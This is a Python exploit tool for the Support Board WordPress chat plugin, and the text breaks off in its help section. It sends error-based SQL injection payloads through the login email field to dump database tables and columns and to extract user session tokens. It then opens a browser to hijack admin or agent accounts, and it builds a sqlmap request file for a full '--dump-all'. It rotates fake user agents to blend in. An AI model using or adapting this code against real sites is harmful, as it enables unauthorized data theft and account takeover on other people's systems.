try:
import requests
import time
import sys
import socket
import base64
import platform
import os
import webbrowser
import random
from colorama import init, Fore
except ImportError:
print("""
Please install the Required Modules using
pip3 install [Module Name]
""")
init()
red = Fore.RED
green = Fore.GREEN
blue = Fore.BLUE
magenta = Fore.MAGENTA
white = Fore.WHITE
reset = Fore.RESET
def clear():
if platform.system() == "Windows":
os.system("cls")
else:
os.system("clear")
class exploit:
def __init__(self):
self.cookies = { "sb-updates": "3.3.4" }
self.user_agents = ['Mozilla/5.0 (Linux; Android 5.1; AFTS Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/41.99900.2250.0242 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:58.0) Gecko/20100101 Firefox/58.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4',
'Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)',
'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.58',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2',
'Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2',
'Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; es-ES; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.558.0 Safari/534.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16',
'Mozilla/5.0 (Windows; Windows NT 6.1; rv:2.0b2) Gecko/20100720 Firefox/4.0b2',
'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',
'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:12.0) Gecko/20100101 Firefox/12.0',
'Mozilla/5.0 (X11; Linux i686; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/63.0.3239.84 Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0b9pre) Gecko/20110111 Firefox/4.0b9pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100308 Ubuntu/10.04 (lucid) Firefox/3.6 GTB7.1',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080214 Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.5) Gecko/20060819 Firefox/1.5.0.5',
'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5',
'Mozilla/5.0 (X11; U; Windows NT 6; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.587.0 Safari/534.12',
'Mozilla/5.0 (X11; Ubuntu; Linux armv7l; rv:17.0) Gecko/20100101 Firefox/17.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Mozilla/5.0 (iPad; CPU OS 11_2_1 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 Mobile/15C153 Safari/604.1']
self.database = []
self.tables = []
self.columns = []
self.tokens = []
self.divider = "---------------------"
def save(self):
new_file = open("content.txt", "w")
new_file.write("Tables Found on The Database\n")
for i in range(len(self.tables)):
new_file.write(self.tables[i]+ "\n")
new_file.write("\n\n Columns In the Table")
new_file.write(self.divider+"\n")
new_file.write(self.tables[0]+'\n')
new_file.write(self.divider+"\n")
for i in range(len(self.columns)):
new_file.write(self.columns[i]+ "\n")
new_file.close()
def get_tables(self, url):
print("\n"+ blue + self.divider + "\n" + red + "DUMPING TABLES" + "\n" + blue + self.divider)
i = 0
while True:
headers = {
"User-Agent": random.choice(self.user_agents),
}
data = {
"function": "login",
"email": "test\" AND GTID_SUBSET(CONCAT((select table_name from information_schema.tables where table_schema=database() LIMIT {0},1),(SELECT (ELT(9164=9164,0x00))),0x00),9164)-- #".format(i),
"password": "test",
"login-cookie": '',
"language": "false"
}
response = requests.post(url, headers=headers, cookies=self.cookies, data=data)
response = response.text
response = response.replace('"error","db-error","sb_db_get","Malformed GTID set specification','')
response = response.replace('[', '')
response = response.replace(']', '')
response = response.replace("'", '')
response = response.replace('"', '')
response = response.replace('.', '')
response = response.replace(' ', '')
print(magenta + response)
self.tables.append(response)
i += 1
if "success,false" in response:
self.tables.pop()
break
print("Tables Found "+ white + str(self.tables))
def get_columns(self,url):
lines = 0
c = 1
i = 0
print("\n"+ blue + self.divider + "\n" + red + self.tables[0] + "\n" + blue + self.divider)
while lines < len(self.tables):
while True:
headers = {
"User-Agent": random.choice(self.user_agents),
}
data = {
"function": "login",
"email": "test\" AND GTID_SUBSET(CONCAT((select column_name from information_schema.columns where table_schema=database() LIMIT {0},1),(SELECT (ELT(9164=9164,0x00))),0x00),9164)-- #".format(i),
"password": "test",
"login-cookie": '',
"language": "false"
}
response = requests.post(url, headers=headers, cookies=self.cookies, data=data)
response = response.text
response = response.replace('"error","db-error","sb_db_get","Malformed GTID set specification','')
response = response.replace('[', '')
response = response.replace(']', '')
response = response.replace("'", '')
response = response.replace('"', '')
response = response.replace('.', '')
response = response.replace(' ', '')
self.columns.append(response)
i += 1
if response == "id":
self.columns.append(self.divider)
self.columns.append(self.tables[c])
self.columns.append(self.divider)
print("\n"+ blue + self.divider + "\n" + red + self.tables[c] + "\n" + blue + self.divider)
c = c + 1
lines = lines + 1
if "success,false" in response:
self.self.columns.pop()
break
print(magenta + response)
break
def get_tokens(self,url, path):
final_path = path.replace("admin.php", "include/ajax.php")
final_url = "{0}{1}".format(url,final_path)
print("\n"+ blue + self.divider + "\n" + red + "Dumping Tokens For Account TakeOver" + "\n" + blue + self.divider)
i = 0
for i in range(0,1):
headers = {
"User-Agent": random.choice(self.user_agents),
}
data = {
"function": "login",
"email": "test\" AND GTID_SUBSET(CONCAT(0x746573747465737474657374,(SELECT (ELT(3469=3469,0x74657374))),database()),3469)-- jXft".format(i),
"password": "test",
"login-cookie": '',
"language": "false"
}
response = requests.post(final_url, headers=headers ,cookies=self.cookies, data=data)
response = response.text
response = response.replace('"error","db-error","sb_db_get","Malformed GTID set specification','')
response = response.replace('testtesttesttest', '')
response = response.replace('[', '')
response = response.replace(']', '')
response = response.replace("'", '')
response = response.replace('"', '')
response = response.replace('.', '')
response = response.replace(' ', '')
self.database.append(response)
while True:
headers = {
"User-Agent": random.choice(self.user_agents),
}
data = {
"function": "login",
"email": 'test\" AND GTID_SUBSET(CONCAT(0x546f6b656e3a2020 ,(SELECT MID((IFNULL(CAST(token AS NCHAR),0x00)),1,190) FROM {0}.sb_users ORDER BY token LIMIT {1},1),0x20),7838)-- #'.format(self.database[0], i),
"password": "test",
"login-cookie": '',
"language": "false"
}
response = requests.post(final_url, headers=headers, cookies=self.cookies, data=data)
response = response.text
response = response.replace('"error","db-error","sb_db_get","Malformed GTID set specification','')
response = response.replace('[', '')
response = response.replace(']', '')
response = response.replace("'", '')
response = response.replace('"', '')
response = response.replace('.', '')
response = response.replace(' ', '')
self.tokens.append(response)
i += 1
if "success,false" in response:
self.tokens.pop()
break
print(blue + response)
print(red + "\nSaving the Tokens into File")
print(red + "Tokens Saved Into tokens.txt\n")
new_file = open("tokens.txt", "w")
new_file.write(self.divider + "\n")
new_file.write("Tokens Found on The Database\n")
new_file.write(self.divider + "\n")
for i in range(len(self.tokens)):
new_file.write(self.tokens[i]+ "\n")
new_file.close()
yes_or_no = str(input(blue + "Do you want to takeover now (Y, N): " + white))
if yes_or_no in ['yes', "Yes", "YES", "y", "Y"]:
token_take_over = str(input("Enter the token: "))
take_over_get(url, path, token_take_over)
else:
sys.exit(0)
"""Generate XML FILE For SQL Injection"""
def manual(url, temp_admin, temp_ajax):
if "https://" in url:
port = 443
protocol = "https"
if "http://" in url:
port = 80
protocol = "http"
post_url = "{0}{1}".format(url, temp_ajax)
sanitize_origin = url
sanitize_origin = sanitize_origin.replace("http://", '')
sanitize_origin = sanitize_origin.replace("https://", '')
sanitize_origin = sanitize_origin.replace(" ", '')
# GET IP OF URL
ip = socket.gethostbyname('{0}'.format(sanitize_origin))
# REQUEST
data_request="""POST {0} HTTP/1.1
Host: {1}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 68
X-Requested-With: XMLHttpRequest
Origin: {2}
Referer: {3}{4}
Connection: close
Cookie: sb-updates=3.3.4
function=login&email=test&password=test&login-cookie=&language=false""".format(temp_ajax, sanitize_origin, url, url, temp_admin)
# base64 encode the request
data_bytes = data_request.encode('utf-8')
b64_bytes_request = base64.b64encode(data_bytes)
b64_string_request = b64_bytes_request.decode('utf-8')
# RESPONSE
response_cookies = {
"sb-updates": "3.3.4"
}
response_headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Origin": "{0}".format(url),
"Referer": "{0}{1}".format(url,temp_admin),
"Connection": "close"
}
response_data = {
"function": "login",
"email": "test",
"password": "test",
"login-cookie": '',
"language": "false"
}
response = requests.post(post_url, headers=response_headers, cookies=response_cookies, data=response_data)
# Output header information and response
var = "HTTP/1.1 200 OK\n"
for key, value in response.headers.items():
var += key + ':' +value+ '\n'
var += '\n'
var += response.text
# base 64 encode the response
response_bytes = var.encode('utf-8')
b64_bytes_response = base64.b64encode(response_bytes)
b64_string_response = b64_bytes_response.decode('utf-8')
# Input in xml file ready for sqlmap
f = open('request.xml', 'w')
f.write(
"""
]>
-
{4}
{5}
{6}
php
200
{9}
JSON
""".format(response.headers['Date'], response.headers['Date'], "{0}{1}".format(url,temp_ajax) , ip, sanitize_origin, port, protocol, temp_ajax, b64_string_request, len(var), b64_string_response))
f.close()
print(red + """[!] request.xml Generated Please Use sqlmap to automate the process\n""")
print(green + """COMMAND : sqlmap -r request.xml --batch --dump-all\n""")
print(blue + "[!] If the Sqlmap does not return any injection points please rerun this manual again and use the new one")
"""NORMAL MODE"""
def main(url):
sqli = exploit()
sqli.get_tables(url)
time.sleep(1)
print(green + "\n\nDumping Columns")
sqli.get_columns(url)
sqli.save()
"""Account Take Over"""
def take_over_get(url, path, token):
print("Steps for account take over")
print(red + "[!] 1. " + white+ "After the First tab opens please refresh it you will have 10 seconds\n")
print(red + "[!] 2. " + white+ "Then it will open a second tab which is the admin login page then please refresh it\n")
print(red + "[!] 3. "+ white+ "Sometimes refresh the admin login page and the first tab a few times\n")
print(red + "[!] 4. " + white+ "After loging out you need to close your browser and run the script again\n")
print(red + "[!] NOTE. " + white+ "Sometimes there are tokens that are not working is because the tokens are from guests and visitors if the token works it belongs to an admin or agent\n\n")
verify = str(input(blue + "[?]" + white + " Do you Agree? [y/n] : "))
if verify in ['yes', "Yes", "YES", "y", "Y"]:
take_over_request = "{0}/?token={1}&chat=open".format(url,token)
webbrowser.open(take_over_request)
print(red + "Taking the Account")
time.sleep(10)
webbrowser.open("{0}{1}".format(url,path))
sys.exit(0)
else:
sys.exit(0)
def help():
print(green + "\nExample Vulnerable URL: https://example.com/wp-content/plugins/supportboard/supportboard/admin.php\n")
print(white + """
Arguments:
normal : Dump Tables, and Columns
